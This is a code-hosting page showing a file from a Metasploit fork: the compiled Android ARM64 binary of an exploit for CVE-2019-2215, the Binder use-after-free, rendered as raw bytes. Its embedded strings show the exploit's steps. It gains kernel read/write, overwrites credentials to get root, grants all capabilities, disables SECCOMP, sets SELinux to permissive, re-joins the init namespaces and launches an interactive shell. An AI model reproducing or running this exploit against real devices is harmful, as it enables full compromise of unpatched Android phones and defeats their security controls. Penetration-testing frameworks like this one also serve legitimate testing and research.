adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/data/exploits/CVE-2019-2215/exploit
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

33 lines
14 KiB
Plaintext
Raw Normal View History

Initial commit of CVE-2019-2215 Android Binder Use-After-Free
2019-10-17 18:37:56 +08:00
ELF·Ð@2@8 @@@@øø888##h,h,h,˜À˜,˜,˜,  PPP¼¼PåtdÐ"Ð"Ð"$$QåtdRåtdh,h,h,˜˜/system/bin/linker64Androidr17c4988734GNU·iŒòÏqßMMþ3ï%+$
*
#)(!'%"&   Ð0ñÿ0ñÿ0"ñÿ(@R' Ô ÊHXÀžM²,h,=C ˜å×é¹{>ˆ,Þ­jMx,0o7_¥libc.soprctlputsforkclose__stack_chk_failmemsetfcntlwrite__sFpipereadsleepprintfsocketpairerrx__libc_initmmapopensetns__errnowaitioctlsystem__cxa_atexitperrorsetbufepoll_ctlepoll_createwritevgetuiderrrecvmsglibm.solibstdc++.solibdl.so_edata__bss_start_endmain__PREINIT_ARRAY____FINI_ARRAY____INIT_ARRAY__LIBCc
\Ø/Ôà/h,ð/ˆ,ø/x,è/Ð.Ø.à. è.
ð. ø. /
/// /(/0/8/@/H/P/X/`/h/p/x/€/ˆ/!/"˜/# /$¨/&°/'¸/(À/)È/*ð{¿©ÐfGù";‘ Ö Õ Õ ÕÐjGùB;‘ ÖÐnGùb;‘ ÖÐrGù‚;‘ ÖÐvGù¢;‘ ÖÐzGùÂ;‘ ÖÐ~Gùâ;‘ ÖЂGù< ÖІGù"< ÖЊGùB< ÖÐŽGùb<‘ ÖÐ’Gù‚<‘ ÖЖGù¢<‘ ÖКGùÂ<‘ ÖОGùâ<‘ ÖТGù= ÖЦGù"=‘ ÖЪGùB=‘ ÖЮGùb=‘ ÖвGù‚=‘ ÖжGù¢=‘ ÖкGùÂ=‘ ÖоGùâ=‘ ÖÐÂGù> ÖÐÆGù"> ÖÐÊGùB> ÖÐÎGùb>‘ ÖÐÒGù‚>‘ ÖÐÖGù¢>‘ ÖÐÚGùÂ>‘ ÖÐÞGùâ>‘ ÖÐâGù? ÖÐæGù"?‘ Öàý{¿©ý‘@´?Öý{Á¨À_ւІЅЄÐý{½©€Òý‘ÆðGù£c‘¥üGù„øGùBìGù¦ù¥ù¤ùÙÿÿ—᪂ÐàÿÿðB`?‘ßÿÿü_¼©öW©ôO©ý{©ýÑÿÑVÐ;ÕÉõ£4‘—ð”ðÀ=©Êùà@¹‚@¹á2ãC‘à€=fÿÿ—À5à£2€Rá*µÿÿ—ˆð@ùêÝ—Ré2ªÕ»ràƒ‘¨&
©ª& ©Hÿÿ—€5à#@¹á€€Râ2¯ÿÿ—@qATpÿÿ—ó*s41` T€AŒR¨râªoÿÿ—à'@¹á£‘"€Rsÿÿ—áªP6‘;ÿÿ—à#@¹”Д"‘âªAÿÿ—@ñAT°@‘hÿÿ—à3&ÿÿ—kaTv@ùˆðÀ6‘ù&ÿÿ—È@ù©Ê@ù ë¡Tÿ‘ý{C©ôOB©öWA©ü_ĨÀ!°5‘à2Hÿÿ—!<6‘à2Dÿÿ—!Ø5‘à2@ÿÿ—à2!€R5ÿÿ—à2÷þÿ—°@‘@ÿÿ—à@¹‚@¹á2ãCÿÿ—°À‘8ÿÿ—à#@¹Ð! ‘â2ÿÿ—Tà'@¹Gÿÿ—°À‘,ÿÿ—à*>ÿÿ—!6‘à2ÿÿ—!6‘à2ÿÿ—!¬6‘à2ÿÿ—ÿÿ—üW½©ôO©ý{©ýƒ‘ÿÃÑSÐ;Õi4‘•ð”ðÀ=©ƒø @¹‚@¹á‘à€=Öþÿ—
5àc2€Rá*%ÿÿ—‰ð)AÃ=éŸùé2é£ùéÝ—Rà€=EÃ=€R©Õ»r飩‰ð)@ùè;ù¨Õ›RèÝ·rè¯ùè2)!‘à2ãc‘â*é?ùà#€=è³ùÿÿ—@5à_@¹!D7‘â2Áþÿ—ñáTÊþÿ— 4T€AŒR¨râªÊþÿ—à[@¹èc‘)€Rá#‘â2ÿùÿ¹è§©ÿÿ©ÿ;¹Ïþÿ—è£@ùé«@ùê³@ùáª(
8‘Šþÿ—h@ù©ƒ]ø ëÁTÿÑý{B©ôOA©üWèÀ!°5‘à2­þÿ—!7‘à2©þÿ—!L7‘à2¥þÿ—à2!€Ršþÿ—à2\þÿ—°@‘¥þÿ— @¹‚@¹á‘lþÿ—°Àþÿ—à_@¹áƒ‘â2yþÿ—Àñ*©þÿ—!6‘à2‰þÿ—tþÿ—!¬7‘à2„þÿ—ÿƒÑúg©ø_©öW©ôO©ý{©ýC‘XÐ;Õ° ‘èùþÿ—à`²á2C€Råªó`²ƒþÿ—ˆðëùa;T“ðsb‘àª+þÿ—@;5=‘á*.þÿ—ˆð¹}€Rþÿ—ˆð¹µþÿ—Fÿÿ—ˆ°õGùáªa‘eþÿ—°@‘Zþÿ—™ð(‘.þÿ—ôªŸ¹`@¹âª0þÿ— ñÁ4ð@@¹á‘â2þÿ— ña4À=‘áª
þÿ—Ÿ¹`@¹¡ ‘â2þÿ— ña2T@@¹á‘â2 þÿ— ñ!2>‘áªøýÿ—èXž’¨¿¿ò¶”>‘áªñýÿ—ß.@òá2Tè^“’¡h?‘êýÿ—Ÿ¹`@¹èl’’¡‹â2üýÿ— ñA.T@@¹á‘â2êýÿ— ñ.¼?‘Øýÿ—(@ùŸ¹`@¹â2A‘êýÿ— ñ,T@@¹á‘â2Øýÿ— ñÁ+° ‘áªÅýÿ—Ÿ¹`@¹×‘âª×ýÿ— ñ¡)T@@¹á‘â2Åýÿ— ña)°‘³ýÿ—ÿùŸ¹`@¹á‘â2Åýÿ— ña&T@@¹âª³ýÿ— ñ!&¹`@¹×2‘⪷ýÿ— ñ¡%T@@¹á‘â2¥ýÿ— ña%°À‘“ýÿ—ÿùŸ¹`@¹á‘â2¥ýÿ— ña"T@@¹âª“ýÿ— ñ!"¹`@¹×R‘⪗ýÿ— ñ¡!T@@¹á‘â2…ýÿ— ña!°‘sýÿ—ÿùŸ¹`@¹á‘â2…ýÿ— ñaT@@¹âªsýÿ— ñ!¹`@¹×r‘âªwýÿ— ñ¡T@@¹á‘â2eýÿ— ña°¼‘Sýÿ—ÿùŸ¹`@¹á‘â2eýÿ— ñaT@@¹âªSýÿ— ñ!TŒýÿ—à5ÿ¹Ÿ¹`@¹á‘â2Uýÿ—ñaT@@¹Á’‘â2Cýÿ—ñ!Tè—@²èùŸ¹`@¹á‘â2Fýÿ— ñT@@¹Á‘â24ýÿ— ñATè—@²èùŸ¹`@¹á‘â27ýÿ— ñ¡T@@¹Áâ‘â2%ýÿ— ñaTè—@²èùŸ¹`@¹á‘â2(ýÿ— ñÁT@@¹Á‘â2ýÿ— ñT°‘=ýÿ—Ÿ¹`<žR( rµ‹âªýÿ—ñaT@@¹á‘â2ýÿ—ñ!°ü‘á*ðüÿ—v4°À ‘$ýÿ—ÿ¹Ÿ¹`@¹á‘â2þüÿ—ñ
T@@¹âªìüÿ—ñ Ti°ýÿ—°@ýÿ—°P‘á*Ïüÿ—@
ø7á2ðüÿ—@
ø7°ýÿ—°¸‘á*Äüÿ—à ø7á2åüÿ—à ø7 €Rêüÿ—à4°@‘öüÿ—5@ùÿùŸ¹`@¹á‘â2Ïüÿ— ñ¡T@@¹âª½üÿ— ñaT5@ùÿùŸ¹`@¹á‘â2Àüÿ— ñÁT@@¹¡â ‘â2®üÿ— ñT5@ùÿùŸ¹`@¹á‘â2±üÿ— ñáT@@¹¡Â ‘â2Ÿüÿ— ñ¡€R·üÿ—À5°À°À‘Àüÿ—°ôüÿ—@ùé ëTý{E©ôOD©öWC©ø_B©úgA©à*ÿƒ‘À!€9‘à2¥üÿ—!4:‘à2¡üÿ—!¼;‘à2üÿ—!`<‘à2™üÿ—°Œ° ‘wüÿ—à2­üÿ—!=‘à2üÿ—!T=‘à2‰üÿ—!ì>‘à2©üÿ—°@
müÿ—°@ ‘†üÿ—à2˜üÿ—ï¾­Þþÿÿÿÿÿÿÿhexdump_memory called with non-full line%08lx %02hhx |epoll_addpipe sizeforkread full pipewritev() returns 0x%x
waitcurrent_ptr == 0x%lx
socketpairXwrite socket dummy bytewrite second chunk to socketrecvmsg() returns %d, expected %lu
kernel writes over PAGE_SIZE are messy, tried 0x%lxkernel_write failed to load userspace bufferkernel_write failed to overwrite kernel memorykernel reads over PAGE_SIZE are messy, tried 0x%lxkernel_read failed to read kernel memorykernel_read failed to write out to userspacemmap 4g alignedkernel_rw_pipe/dev/bindercurrent->mm == 0x%lx
current->mm->user_ns == 0x%lx
kernel base is 0x%lx
bad kernel base (not 0x...000)&init_task == 0x%lx
init_task.cred == 0x%lx
current->cred == 0x%lx
euid == 0x%lx
fsuid == 0x%lx
SELinux status = %u
/proc/1/ns/mntopensetns/proc/1/ns/net/system/bin/sh -iPARENT: Finished calling READVCHILD: Finished write to FIFO.CHILD: Doing EPOLL_CTL_DEL.CHILD: Finished EPOLL_CTL_DEL.should have stable kernel R/W nowCapabilities set to ALLSELinux is already in permissive modeRe-joining the init mount namespace...Re-joining the init net namespace...SECCOMP is already disabled!Disabling SECCOMPSECCOMP disabled!Failed to disable SECCOMP!Setting SELinux to permissiveSomething went wrong changing our UID to root!Starting POC;$xíÿÿ@ÀïÿÿhòÿÿzR| $0íÿÿHX ž
œ$DPïÿÿDT ž
œ ,llñÿÿ \ ž
˜šÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿñù h,!x,ˆ,`X
a ¸.°
8
x ûÿÿoþÿÿo
ÿÿÿoðÿÿo ùÿÿo°
Reference in New Issue Copy Permalink